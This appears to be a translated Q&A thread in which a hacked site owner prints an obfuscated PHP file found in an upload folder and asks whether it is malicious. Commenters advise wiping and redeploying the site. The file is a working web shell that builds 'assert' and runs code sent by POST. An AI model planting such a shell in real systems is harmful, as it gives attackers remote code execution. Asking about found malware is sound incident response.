0
最近我發現我的項目被黑客攻擊,並在我的圖片文件夾中找到了一個腳本,其中有一個用戶上傳圖片的目錄(使用文件輸入)。這是我在目錄中找到的腳本。我上傳文件夾中的未知PHP文件,是不是惡意代碼?
errot_db.php
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
這個問題屬於security.stackexchange.com – georoot
如果它不是你的代碼的人工產物,它不屬於那裏。擦掉整個輸出並重新部署已知的工作副本。 – David
@georoot他們真的確實uncrappify我的wordpress類問題?你確定嗎? – PeeHaa